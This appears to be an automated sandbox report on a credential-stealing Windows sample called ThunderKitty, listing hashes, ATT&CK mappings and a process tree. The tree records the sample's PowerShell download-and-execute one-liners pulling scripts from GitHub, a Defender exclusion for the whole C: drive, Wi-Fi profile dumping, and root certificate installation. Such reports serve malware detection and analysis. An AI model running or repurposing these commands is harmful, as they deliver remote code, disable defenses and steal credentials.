8df56196a7e447f592195adc3732a0fc709bd2b4c5b26ef7ea38175803ae3a12

Analysis

max time kernel
147s
max time network
123s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
25/08/2024, 22:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe
Size

14.0MB
MD5

1efbe434510bf569394240170f3b2870
SHA1

f5169fff34809dc7c9438cabe91b8940c70f7b45
SHA256

8df56196a7e447f592195adc3732a0fc709bd2b4c5b26ef7ea38175803ae3a12
SHA512

e52539c324ef42b6e522c5f872be66c0114b0382b6de613b9dfbfcf58f996347cb9c9b3071a2aecc1ede4a79d86fd9698f5047ad1ab2a0aefb59291b36e5e8e5
SSDEEP

98304:jFzji0rxnPrr9G2VsLAfmQ0VEjp90RTFh1vkMcFJqEFnIV0PvrIIKJu4ahDXFNkW:Be0rxnAemmdRbIV2v14AFmA/NGaX

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation ransomware spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs

evasion

File and Directory Discovery

T1083

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened (read-only)	C:\Windows\System32\drivers\vboxmouse.sys	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
12	4104	powershell.exe
17	2976	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4104	powershell.exe
2976	powershell.exe
840	powershell.exe
3816	PowerShell.exe

Looks for VMWare drivers on disk 2 TTPs 2 IoCs

evasion

File and Directory Discovery

T1083

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened (read-only)	C:\Windows\System32\drivers\vmmemctl.sys	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe
File opened (read-only)	C:\Windows\System32\drivers\vmmouse.sys	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3328	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
11	raw.githubusercontent.com
12	raw.githubusercontent.com
17	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
4644	ARP.EXE

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Thunder_Kitty.jpg"	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4488	netsh.exe
1596	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
3252	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4336	ipconfig.exe
3252	NETSTAT.EXE
2260	ipconfig.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2708	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\Desktop\TileWallpaper = "0"	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\Desktop\WallpaperStyle = "2"	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
840	powershell.exe
4104	powershell.exe
840	powershell.exe
4104	powershell.exe
2976	powershell.exe
3816	PowerShell.exe
3816	PowerShell.exe
2976	powershell.exe
2976	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	840	powershell.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	3816	PowerShell.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: 33	4428	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4428	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	2976	powershell.exe
Token: SeSecurityPrivilege	2976	powershell.exe
Token: SeTakeOwnershipPrivilege	2976	powershell.exe
Token: SeLoadDriverPrivilege	2976	powershell.exe
Token: SeSystemProfilePrivilege	2976	powershell.exe
Token: SeSystemtimePrivilege	2976	powershell.exe
Token: SeProfSingleProcessPrivilege	2976	powershell.exe
Token: SeIncBasePriorityPrivilege	2976	powershell.exe
Token: SeCreatePagefilePrivilege	2976	powershell.exe
Token: SeBackupPrivilege	2976	powershell.exe
Token: SeRestorePrivilege	2976	powershell.exe
Token: SeShutdownPrivilege	2976	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeSystemEnvironmentPrivilege	2976	powershell.exe
Token: SeRemoteShutdownPrivilege	2976	powershell.exe
Token: SeUndockPrivilege	2976	powershell.exe
Token: SeManageVolumePrivilege	2976	powershell.exe
Token: 33	2976	powershell.exe
Token: 34	2976	powershell.exe
Token: 35	2976	powershell.exe
Token: 36	2976	powershell.exe
Token: SeIncreaseQuotaPrivilege	2976	powershell.exe
Token: SeSecurityPrivilege	2976	powershell.exe
Token: SeTakeOwnershipPrivilege	2976	powershell.exe
Token: SeLoadDriverPrivilege	2976	powershell.exe
Token: SeSystemProfilePrivilege	2976	powershell.exe
Token: SeSystemtimePrivilege	2976	powershell.exe
Token: SeProfSingleProcessPrivilege	2976	powershell.exe
Token: SeIncBasePriorityPrivilege	2976	powershell.exe
Token: SeCreatePagefilePrivilege	2976	powershell.exe
Token: SeBackupPrivilege	2976	powershell.exe
Token: SeRestorePrivilege	2976	powershell.exe
Token: SeShutdownPrivilege	2976	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeSystemEnvironmentPrivilege	2976	powershell.exe
Token: SeRemoteShutdownPrivilege	2976	powershell.exe
Token: SeUndockPrivilege	2976	powershell.exe
Token: SeManageVolumePrivilege	2976	powershell.exe
Token: 33	2976	powershell.exe
Token: 34	2976	powershell.exe
Token: 35	2976	powershell.exe
Token: 36	2976	powershell.exe
Token: SeIncreaseQuotaPrivilege	2976	powershell.exe
Token: SeSecurityPrivilege	2976	powershell.exe
Token: SeTakeOwnershipPrivilege	2976	powershell.exe
Token: SeLoadDriverPrivilege	2976	powershell.exe
Token: SeSystemProfilePrivilege	2976	powershell.exe
Token: SeSystemtimePrivilege	2976	powershell.exe
Token: SeProfSingleProcessPrivilege	2976	powershell.exe
Token: SeIncBasePriorityPrivilege	2976	powershell.exe
Token: SeCreatePagefilePrivilege	2976	powershell.exe
Token: SeBackupPrivilege	2976	powershell.exe
Token: SeRestorePrivilege	2976	powershell.exe
Token: SeShutdownPrivilege	2976	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeSystemEnvironmentPrivilege	2976	powershell.exe
Token: SeRemoteShutdownPrivilege	2976	powershell.exe
Token: SeUndockPrivilege	2976	powershell.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 2768 wrote to memory of 4104	2768	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe	85
PID 2768 wrote to memory of 4104	2768	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe	85
PID 2768 wrote to memory of 840	2768	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe	86
PID 2768 wrote to memory of 840	2768	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe	86
PID 2768 wrote to memory of 2976	2768	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe	87
PID 2768 wrote to memory of 2976	2768	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe	87
PID 2768 wrote to memory of 1144	2768	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe	89
PID 2768 wrote to memory of 1144	2768	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe	89
PID 2768 wrote to memory of 3816	2768	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe	90
PID 2768 wrote to memory of 3816	2768	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe	90
PID 2768 wrote to memory of 4348	2768	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe	91
PID 2768 wrote to memory of 4348	2768	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe	91
PID 2768 wrote to memory of 3892	2768	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe	92
PID 2768 wrote to memory of 3892	2768	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe	92
PID 4348 wrote to memory of 1928	4348	cmd.exe	93
PID 4348 wrote to memory of 1928	4348	cmd.exe	93
PID 2976 wrote to memory of 2960	2976	powershell.exe	94
PID 2976 wrote to memory of 2960	2976	powershell.exe	94
PID 2960 wrote to memory of 2832	2960	csc.exe	95
PID 2960 wrote to memory of 2832	2960	csc.exe	95
PID 2976 wrote to memory of 4488	2976	powershell.exe	97
PID 2976 wrote to memory of 4488	2976	powershell.exe	97
PID 2976 wrote to memory of 4492	2976	powershell.exe	102
PID 2976 wrote to memory of 4492	2976	powershell.exe	102
PID 4492 wrote to memory of 4024	4492	net.exe	103
PID 4492 wrote to memory of 4024	4492	net.exe	103
PID 2976 wrote to memory of 3328	2976	powershell.exe	104
PID 2976 wrote to memory of 3328	2976	powershell.exe	104
PID 2768 wrote to memory of 2708	2768	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe	105
PID 2768 wrote to memory of 2708	2768	2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe	105
PID 2976 wrote to memory of 2900	2976	powershell.exe	106
PID 2976 wrote to memory of 2900	2976	powershell.exe	106
PID 2976 wrote to memory of 3340	2976	powershell.exe	107
PID 2976 wrote to memory of 3340	2976	powershell.exe	107
PID 3340 wrote to memory of 3344	3340	net.exe	108
PID 3340 wrote to memory of 3344	3340	net.exe	108
PID 2976 wrote to memory of 4336	2976	powershell.exe	109
PID 2976 wrote to memory of 4336	2976	powershell.exe	109
PID 2976 wrote to memory of 1416	2976	powershell.exe	110
PID 2976 wrote to memory of 1416	2976	powershell.exe	110
PID 1416 wrote to memory of 1520	1416	net.exe	111
PID 1416 wrote to memory of 1520	1416	net.exe	111
PID 2976 wrote to memory of 4908	2976	powershell.exe	112
PID 2976 wrote to memory of 4908	2976	powershell.exe	112
PID 2976 wrote to memory of 3252	2976	powershell.exe	113
PID 2976 wrote to memory of 3252	2976	powershell.exe	113
PID 2976 wrote to memory of 2216	2976	powershell.exe	114
PID 2976 wrote to memory of 2216	2976	powershell.exe	114
PID 2976 wrote to memory of 2260	2976	powershell.exe	115
PID 2976 wrote to memory of 2260	2976	powershell.exe	115
PID 2976 wrote to memory of 3316	2976	powershell.exe	116
PID 2976 wrote to memory of 3316	2976	powershell.exe	116
PID 2976 wrote to memory of 4644	2976	powershell.exe	117
PID 2976 wrote to memory of 4644	2976	powershell.exe	117
PID 2976 wrote to memory of 1596	2976	powershell.exe	118
PID 2976 wrote to memory of 1596	2976	powershell.exe	118

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3892	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe"
1⤵
- Looks for VirtualBox drivers on disk
- Looks for VMWare drivers on disk
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2976
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mr1elz5x\mr1elz5x.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2960
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES953B.tmp" "c:\Users\Admin\AppData\Local\Temp\mr1elz5x\CSCEE0AB313998A49A5A0C7AF4E321C8B13.TMP"
      4⤵
      PID:2832
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4488
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4492
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:4024
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:3328
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:2900
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3340
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:3344
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:4336
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1416
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:1520
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:4908
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:3252
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:2216
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:2260
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:3316
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:4644
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1596
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:1144
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3816
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4348
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:1928
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:3892
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wallpaper32.exe
  2⤵
  - Kills process with taskkill
  PID:2708

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x52c 0x524
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4428

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

File and Directory Discovery

T1083

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
